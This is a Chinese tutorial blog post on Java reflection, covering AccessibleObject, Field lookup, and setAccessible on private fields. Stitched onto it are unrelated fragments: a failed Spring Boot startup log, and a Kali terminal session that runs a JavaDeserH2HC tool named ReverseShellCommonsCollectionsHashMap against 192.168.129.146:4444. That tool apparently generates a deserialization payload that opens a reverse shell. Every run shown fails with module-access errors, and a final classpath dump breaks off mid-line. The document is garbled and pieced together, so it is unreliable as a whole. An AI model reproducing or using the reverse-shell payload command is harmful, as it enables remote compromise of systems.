黑马程序员--03.反射--04【AccessibleObject类】【反射获取成员字段】

本文详细介绍了Java中的AccessibleObject类及其在反射中的作用,包括取消访问控制检查的能力。同时,讲解了如何通过Field类获取和操作成员字段,包括公有和私有字段,并对比了传统与反射操作字段的区别。

反射----4

      AccessibleObject类        反射获取成员字段

----------- android培训java培训、java学习型技术博客、期待与您交流! ------------

1.    AccessibleObject类

1). AccessibleObject类 (可访问对象类)

(1). 继承体系结构


FieldConstructorMethod类都是AccessibleObject类的子类。

(2). AccessibleObject基本作用

[1]. 将反射的对象标记为在使用时取消默认 Java 语言访问控制检查的能力

[2]. 在反射对象设置accessible 标志允许具有足够特权

2). AccessibleObject类常用方法

设置反射对象的accessible标志

指定反射的对象的accessible 标志

public void setAccessible(boolean flag)throwsSecurityException{…}

[1]. 当输入参数flag为true的时候,指示反射对象被使用时取消Java语言访问权限检查

[1]. 当输入参数flag为false的时候,指示反射对象应该实施Java语言访问权限检查

2.    反射获取成员字段

1). 成员字段类java.lang.reflect.Field

Field类的基本概念

[1]. Field所在的位置

Field类位于java语言包 (lang)的反射子包(reflect)java.lang.reflect

[2]. Field描述的事物

Field抽象的是各个类成员变量的总体。

[3]. Field类的源码声明

public final

class Field extends AccessibleObject implements Member{…}

【结论】Field不可以被继承类。注意,Field不是泛型类

2). 获取成员字段类实例对象的方式

实体类:

public class Person {
private int age;
    private String name;
    int height;
    protected String address;
    public String country;
}

(1). Class类对象4种方法可以获取Field类对象。

[1].  Class类getFields()方法

public Field[] getFields()throwsSecurityException {…}

{1}. 获取一个类的对象public成员字段对应的Field对象

{2}. 测试代码:

Class clazz =Class.forName("cn.itcast.bean.Person");
Field[] fields =clazz.getFields();
for(Field f: fields){
    System.out.println(f);
}

打印结果:

public java.lang.Stringcn.itcast.bean.Person.country

[2].  Class类getDeclaredFields()方法

    public Field[]getDeclaredFields()throws SecurityException {…}

{1}.获取一个类的对象所有任意访问权限(private/protected/public/默认)成员字段对应的Field对象

{2}. 测试代码: 

Class clazz =Class.forName("cn.itcast.bean.Person");
Field[] fields =clazz.getDeclaredFields();
for(Field f: fields){
    System.out.println(f);
}

打印结果:

private int cn.itcast.bean.Person.age

private java.lang.String cn.itcast.bean.Person.name

int cn.itcast.bean.Person.height

protected java.lang.Stringcn.itcast.bean.Person.address

public java.lang.Stringcn.itcast.bean.Person.country

 

[3].  Class类 getField(Stringname)方法

public Field getField(String name)

        throws NoSuchFieldException,SecurityException {…}

依据给定的字段名(String) 获取指定的public字段类对象

[4]. Class类 getDeclaredField(Stringname)方法

public Field getDeclaredField(String name)

        throws NoSuchFieldException,SecurityException {…}

依据给定的字段名(String) 获取指定的任意权限字段类对象

(2). 调用Field类对象的set/get方法来操作对应的字段

[1]. Field类set( )方法源码声明

public void set(Object obj, Object value)

        throws IllegalArgumentException,IllegalAccessException{…};

对象objField关联的字段设置任意类型的值value(因为参数值是Object)

[2]. Field类get( )方法源码声明

public Object get(Object obj)

       throws IllegalArgumentException,IllegalAccessException{…};

获取对象objField关联的字段的值

(3). 操作不同权限字段类对象

[1]. 操作公有public字段类对象

{1}. getField()操作public字段类对象

【示例代码】

Class clazz =Class.forName("cn.itcast.bean.Person");
//country为public字段
Field field =clazz.getField("country");
sop(field);
Object obj =clazz.newInstance();
field.set(obj, "China");
Object o =field.get(obj);
sop(o);

运行结果:

public java.lang.String cn.itcast.bean.Person.country

Person run...

China

{2}. getField( )操作公有字段类对象 ----抛出异常

【示例代码】

Class clazz =Class.forName("cn.itcast.bean.Person");
//age是private字段
Field field =clazz.getField("age");
sop(field);
Object obj =clazz.newInstance();
field.set(obj, 110);
Object o =field.get(obj);
sop(o);
 

运行结果抛出异常:

java.lang.NoSuchFieldException: age

【分析】由于getField仅仅能获取public类型的字段。但是age是private类型字段,所以getField没有获取到这个字段。

[2]. 操作其他非公有字段类对象

{1}.使用getDeclaredField( )直接操作非公有类型的字段 -----直接抛出异常

【示例代码】

Class clazz =Class.forName("cn.itcast.bean.Person");
Field field =clazz.getDeclaredField("age");
sop(field);
Object obj =clazz.newInstance();
field.set(obj, 110);
Object o =field.get(obj);
sop(o);
 

运行结果抛出异常:

private int cn.itcast.bean.Person.age

Person run...

java.lang.IllegalAccessException: Class ReflectDemoIII can notaccess a member of class cn.itcast.bean.Person with modifiers"private"

 

【分析】使用getDeclaredField( )方法获取任意类型的字段,所以没有抛出

java.lang.NoSuchFieldException的异常。但是由于age是private类型的,所以不能直接操作。因此抛出非法权限访问异常

正确操作非公有字段的方法】采用getDeclaredField()获取指定的非公有字段,然后指示JVM取消对反射的对象进行Java访问权限检查的机制。之后再进行操作

{2}.使用getDeclaredField( )+ 取消对反射对象进行访问权限检查机制 操作非public字段

【示例代码】

Class clazz =Class.forName("cn.itcast.bean.Person");
Field field =clazz.getDeclaredField("age");
 
//取消对反射对象进行访问权限检查机制
field.setAccessible(true);
 
sop(field);
Object obj =clazz.newInstance();
field.set(obj, 110);
Object o =field.get(obj);
sop(o);
 

运行结果

private int cn.itcast.bean.Person.age

Person run...

110

3.    传统操作字段 VS 反射操作字段

(1). 反射操作字段步骤

通过Field的方法set()/get()方法操作字段的步骤

step1:通过以字符串形式给出的全类名 ===>获取Class对象

step2:调用Class对象newInstance()方法来实例化Class对象对应类的实例

step3关联String字段名

Class对象指定操作的字段第一次关联 ===> Field对象

关联方法:调用Field类的get[Declared]Field函数。

【step 4第二次关联String操作字段的方法】这一步省略掉。因为操作字段的方法都是setter或者getter。这个时候,Field本身也具备set( )方法或者get( )方法,所以Field知道调用哪个方法来操作字段。所以第二次关联取消。

step5关联字段名对应的字段值+字段所属的对象 (set)

          关联字段所属的对象 (get)

(2). 传统操作字段 和 反射操作字段的关系


----------- android培训java培训、java学习型技术博客、期待与您交流! ------------

 

E:\jdk17\bin\java.exe -XX:TieredStopAtLevel=1 -Dspring.output.ansi.enabled=always -Dcom.sun.management.jmxremote -Dspring.jmx.enabled=true -Dspring.liveBeansView.mbeanDomain -Dspring.application.admin.enabled=true "-javaagent:E:\Java Web\IntelliJ IDEA 2023.3.1\lib\idea_rt.jar=54988:E:\Java Web\IntelliJ IDEA 2023.3.1\bin" -Dfile.encoding=UTF-8 -classpath "E:\web projects\StuInfoSystem-master\target\classes;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\webjars\bootstrap\4.0.0\bootstrap-4.0.0.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\webjars\npm\popper.js\1.11.1\popper.js-1.11.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\webjars\jquery\3.3.1\jquery-3.3.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter-jdbc\1.5.10.RELEASE\spring-boot-starter-jdbc-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter\1.5.10.RELEASE\spring-boot-starter-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot\1.5.10.RELEASE\spring-boot-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-autoconfigure\1.5.10.RELEASE\spring-boot-autoconfigure-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter-logging\1.5.10.RELEASE\spring-boot-starter-logging-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\ch\qos\logback\logback-classic\1.1.11\logback-classic-1.1.11.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\ch\qos\logback\logback-core\1.1.11\logback-core-1.1.11.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\slf4j\jcl-over-slf4j\1.7.25\jcl-over-slf4j-1.7.25.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\slf4j\jul-to-slf4j\1.7.25\jul-to-slf4j-1.7.25.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\slf4j\log4j-over-slf4j\1.7.25\log4j-over-slf4j-1.7.25.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\yaml\snakeyaml\1.17\snakeyaml-1.17.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\tomcat-jdbc\8.5.27\tomcat-jdbc-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\tomcat-juli\8.5.27\tomcat-juli-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-jdbc\4.3.14.RELEASE\spring-jdbc-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-beans\4.3.14.RELEASE\spring-beans-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-tx\4.3.14.RELEASE\spring-tx-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\mysql\mysql-connector-java\8.0.11\mysql-connector-java-8.0.11.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\google\protobuf\protobuf-java\2.6.0\protobuf-java-2.6.0.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter-thymeleaf\1.5.10.RELEASE\spring-boot-starter-thymeleaf-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\thymeleaf\thymeleaf-spring4\3.0.9.RELEASE\thymeleaf-spring4-3.0.9.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\thymeleaf\thymeleaf\3.0.9.RELEASE\thymeleaf-3.0.9.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\attoparser\attoparser\2.0.4.RELEASE\attoparser-2.0.4.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\unbescape\unbescape\1.1.5.RELEASE\unbescape-1.1.5.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\slf4j\slf4j-api\1.7.25\slf4j-api-1.7.25.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\nz\net\ultraq\thymeleaf\thymeleaf-layout-dialect\2.2.2\thymeleaf-layout-dialect-2.2.2.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\nz\net\ultraq\thymeleaf\thymeleaf-expression-processor\1.1.3\thymeleaf-expression-processor-1.1.3.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\codehaus\groovy\groovy\2.4.13\groovy-2.4.13.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\alibaba\druid\1.1.8\druid-1.1.8.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\net\minidev\json-smart\2.2.1\json-smart-2.2.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\net\minidev\accessors-smart\1.1\accessors-smart-1.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\ow2\asm\asm\5.0.3\asm-5.0.3.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter-web\1.5.10.RELEASE\spring-boot-starter-web-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\hibernate\hibernate-validator\5.3.6.Final\hibernate-validator-5.3.6.Final.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\javax\validation\validation-api\1.1.0.Final\validation-api-1.1.0.Final.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\jboss\logging\jboss-logging\3.3.1.Final\jboss-logging-3.3.1.Final.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\fasterxml\classmate\1.3.4\classmate-1.3.4.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\fasterxml\jackson\core\jackson-databind\2.8.10\jackson-databind-2.8.10.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\fasterxml\jackson\core\jackson-annotations\2.8.0\jackson-annotations-2.8.0.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\fasterxml\jackson\core\jackson-core\2.8.10\jackson-core-2.8.10.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-web\4.3.14.RELEASE\spring-web-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-aop\4.3.14.RELEASE\spring-aop-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-context\4.3.14.RELEASE\spring-context-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-webmvc\4.3.14.RELEASE\spring-webmvc-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\mybatis\spring\boot\mybatis-spring-boot-starter\1.3.1\mybatis-spring-boot-starter-1.3.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\mybatis\spring\boot\mybatis-spring-boot-autoconfigure\1.3.1\mybatis-spring-boot-autoconfigure-1.3.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\mybatis\mybatis\3.4.5\mybatis-3.4.5.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\mybatis\mybatis-spring\1.3.1\mybatis-spring-1.3.1.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-starter-tomcat\1.5.10.RELEASE\spring-boot-starter-tomcat-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\embed\tomcat-embed-core\8.5.27\tomcat-embed-core-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\tomcat-annotations-api\8.5.27\tomcat-annotations-api-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\embed\tomcat-embed-el\8.5.27\tomcat-embed-el-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\tomcat\embed\tomcat-embed-websocket\8.5.27\tomcat-embed-websocket-8.5.27.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\hamcrest\hamcrest-core\1.3\hamcrest-core-1.3.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-core\4.3.14.RELEASE\spring-core-4.3.14.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\junit\junit\4.12\junit-4.12.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\boot\spring-boot-configuration-processor\1.5.10.RELEASE\spring-boot-configuration-processor-1.5.10.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\apache\ibatis\ibatis-core\3.0\ibatis-core-3.0.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\javax\servlet\javax.servlet-api\3.1.0\javax.servlet-api-3.1.0.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\org\springframework\spring-expression\4.3.16.RELEASE\spring-expression-4.3.16.RELEASE.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\github\pagehelper\pagehelper-spring-boot-starter\1.2.10\pagehelper-spring-boot-starter-1.2.10.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\github\pagehelper\pagehelper-spring-boot-autoconfigure\1.2.10\pagehelper-spring-boot-autoconfigure-1.2.10.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\github\pagehelper\pagehelper\5.1.8\pagehelper-5.1.8.jar;E:\Java Web\javawebb\maven\apache-maven-3.9.9\maven-repo\com\github\jsqlparser\jsqlparser\1.2\jsqlparser-1.2.jar" com.lc.demo.DemoApplication . ____ _ __ _ _ /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \ ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \ \\/ ___)| |_)| | | | | || (_| | ) ) ) ) ' |____| .__|_| |_|_| |_\__, | / / / / =========|_|==============|___/=/_/_/_/ :: Spring Boot :: (v1.5.10.RELEASE) 2025-06-16 21:30:29.153 INFO 27400 --- [ main] com.lc.demo.DemoApplication : Starting DemoApplication on Cui with PID 27400 (started by 19811 in E:\web projects\StuInfoSystem-master) 2025-06-16 21:30:29.159 INFO 27400 --- [ main] com.lc.demo.DemoApplication : No active profile set, falling back to default profiles: default 2025-06-16 21:30:29.441 INFO 27400 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@5a9f4771: startup date [Mon Jun 16 21:30:29 CST 2025]; root of context hierarchy 2025-06-16 21:30:30.143 ERROR 27400 --- [ main] o.s.boot.SpringApplication : Application startup failed java.lang.IllegalStateException: Cannot load configuration class: com.lc.demo.DemoApplication at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:403) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.postProcessBeanFactory(ConfigurationClassPostProcessor.java:249) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:283) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.support.PostProcessorRegistrationDelegate.invokeBeanFactoryPostProcessors(PostProcessorRegistrationDelegate.java:127) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.support.AbstractApplicationContext.invokeBeanFactoryPostProcessors(AbstractApplicationContext.java:687) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:525) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.boot.context.embedded.EmbeddedWebApplicationContext.refresh(EmbeddedWebApplicationContext.java:122) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:693) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:360) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:303) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1118) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at org.springframework.boot.SpringApplication.run(SpringApplication.java:1107) ~[spring-boot-1.5.10.RELEASE.jar:1.5.10.RELEASE] at com.lc.demo.DemoApplication.main(DemoApplication.java:12) ~[classes/:na] Caused by: java.lang.ExceptionInInitializerError: null at org.springframework.context.annotation.ConfigurationClassEnhancer.newEnhancer(ConfigurationClassEnhancer.java:122) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.annotation.ConfigurationClassEnhancer.enhance(ConfigurationClassEnhancer.java:110) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.context.annotation.ConfigurationClassPostProcessor.enhanceConfigurationClasses(ConfigurationClassPostProcessor.java:393) ~[spring-context-4.3.14.RELEASE.jar:4.3.14.RELEASE] ... 12 common frames omitted Caused by: org.springframework.cglib.core.CodeGenerationException: java.lang.reflect.InaccessibleObjectException-->Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @59309333 at org.springframework.cglib.core.ReflectUtils.defineClass(ReflectUtils.java:464) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:336) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:93) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:91) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.internal.LoadingCache$2.call(LoadingCache.java:54) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[na:na] at org.springframework.cglib.core.internal.LoadingCache.createEntry(LoadingCache.java:61) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.internal.LoadingCache.get(LoadingCache.java:34) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator$ClassLoaderData.get(AbstractClassGenerator.java:116) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.create(AbstractClassGenerator.java:291) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.create(KeyFactory.java:221) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:174) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.KeyFactory.create(KeyFactory.java:153) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.proxy.Enhancer.<clinit>(Enhancer.java:73) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] ... 15 common frames omitted Caused by: java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int,java.security.ProtectionDomain) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to unnamed module @59309333 at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354) ~[na:na] at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297) ~[na:na] at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199) ~[na:na] at java.base/java.lang.reflect.Method.setAccessible(Method.java:193) ~[na:na] at org.springframework.cglib.core.ReflectUtils$1.run(ReflectUtils.java:61) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at java.base/java.security.AccessController.doPrivileged(AccessController.java:569) ~[na:na] at org.springframework.cglib.core.ReflectUtils.<clinit>(ReflectUtils.java:52) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.KeyFactory$Generator.generateClass(KeyFactory.java:243) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.DefaultGeneratorStrategy.generate(DefaultGeneratorStrategy.java:25) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] at org.springframework.cglib.core.AbstractClassGenerator.generate(AbstractClassGenerator.java:329) ~[spring-core-4.3.14.RELEASE.jar:4.3.14.RELEASE] ... 27 common frames omitted 2025-06-16 21:30:30.144 INFO 27400 --- [ main] ationConfigEmbeddedWebApplicationContext : Closing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@5a9f4771: startup date [Mon Jun 16 21:30:29 CST 2025]; root of context hierarchy 进程已结束,退出代码为 1
06-17
┌──(root㉿kali)-[~/JavaDeserH2HC] └─# javac -encoding UTF-8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java ┌──(root㉿kali)-[~/JavaDeserH2HC] └─# java -encoding UTF-8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.129.146:4444 Unrecognized option: -encoding Error: Could not create the Java Virtual Machine. Error: A fatal exception has occurred. Program will exit. ┌──(root㉿kali)-[~/JavaDeserH2HC] └─# javac -encoding UTF-8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java ┌──(root㉿kali)-[~/JavaDeserH2HC] └─# java -encoding UTF-8 -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.129.146:4444 Unrecognized option: -encoding Error: Could not create the Java Virtual Machine. Error: A fatal exception has occurred. Program will exit. ┌──(root㉿kali)-[~/JavaDeserH2HC] └─# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.129.146:4444 Exception in thread "main" java.lang.reflect.InaccessibleObjectException: Unable to make field transient java.util.HashMap java.util.HashSet.map accessible: module java.base does not "opens java.util" to unnamed module @76ed5528 at java.base/java.lang.reflect.AccessibleObject.throwInaccessibleObjectException(AccessibleObject.java:391) at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:367) at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:315) at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:183) at java.base/java.lang.reflect.Field.setAccessible(Field.java:177) at ReverseShellCommonsCollectionsHashMap.main(ReverseShellCommonsCollectionsHashMap.java:105)
07-09
F:\javaTools\jdk-17\bin\java.exe -XX:TieredStopAtLevel=1 -Dspring.output.ansi.enabled=always -Dcom.sun.management.jmxremote -Dspring.jmx.enabled=true -Dspring.liveBeansView.mbeanDomain -Dspring.application.admin.enabled=true "-javaagent:F:\javaTools\IntelliJ IDEA 2025.2\lib\idea_rt.jar=59747" -Dfile.encoding=UTF-8 -classpath F:\javaCode\spring-boot-02-config\target\classes;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot-starter-web\1.5.9.RELEASE\spring-boot-starter-web-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot-starter\1.5.9.RELEASE\spring-boot-starter-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot\1.5.9.RELEASE\spring-boot-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot-autoconfigure\1.5.9.RELEASE\spring-boot-autoconfigure-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot-starter-logging\1.5.9.RELEASE\spring-boot-starter-logging-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\ch\qos\logback\logback-classic\1.1.11\logback-classic-1.1.11.jar;F:\javaTools\apache-maven\maven-repository\ch\qos\logback\logback-core\1.1.11\logback-core-1.1.11.jar;F:\javaTools\apache-maven\maven-repository\org\slf4j\jcl-over-slf4j\1.7.25\jcl-over-slf4j-1.7.25.jar;F:\javaTools\apache-maven\maven-repository\org\slf4j\jul-to-slf4j\1.7.25\jul-to-slf4j-1.7.25.jar;F:\javaTools\apache-maven\maven-repository\org\slf4j\log4j-over-slf4j\1.7.25\log4j-over-slf4j-1.7.25.jar;F:\javaTools\apache-maven\maven-repository\org\yaml\snakeyaml\1.17\snakeyaml-1.17.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\boot\spring-boot-starter-tomcat\1.5.9.RELEASE\spring-boot-starter-tomcat-1.5.9.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\apache\tomcat\embed\tomcat-embed-core\8.5.23\tomcat-embed-core-8.5.23.jar;F:\javaTools\apache-maven\maven-repository\org\apache\tomcat\tomcat-annotations-api\8.5.23\tomcat-annotations-api-8.5.23.jar;F:\javaTools\apache-maven\maven-repository\org\apache\tomcat\embed\tomcat-embed-el\8.5.23\tomcat-embed-el-8.5.23.jar;F:\javaTools\apache-maven\maven-repository\org\apache\tomcat\embed\tomcat-embed-websocket\8.5.23\tomcat-embed-websocket-8.5.23.jar;F:\javaTools\apache-maven\maven-repository\org\hibernate\hibernate-validator\5.3.6.Final\hibernate-validator-5.3.6.Final.jar;F:\javaTools\apache-maven\maven-repository\javax\validation\validation-api\1.1.0.Final\validation-api-1.1.0.Final.jar;F:\javaTools\apache-maven\maven-repository\org\jboss\logging\jboss-logging\3.3.1.Final\jboss-logging-3.3.1.Final.jar;F:\javaTools\apache-maven\maven-repository\com\fasterxml\classmate\1.3.4\classmate-1.3.4.jar;F:\javaTools\apache-maven\maven-repository\com\fasterxml\jackson\core\jackson-databind\2.8.10\jackson-databind-2.8.10.jar;F:\javaTools\apache-maven\maven-repository\com\fasterxml\jackson\core\jackson-annotations\2.8.0\jackson-annotations-2.8.0.jar;F:\javaTools\apache-maven\maven-repository\com\fasterxml\jackson\core\jackson-core\2.8.10\jackson-core-2.8.10.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-web\4.3.13.RELEASE\spring-web-4.3.13.RELEASE.jar;F:\javaTools\apache-maven\maven-repository\org\springframework\spring-aop\4.3.13.RELEASE\spring-aop-4.3.13.RELEASE.jar;F:\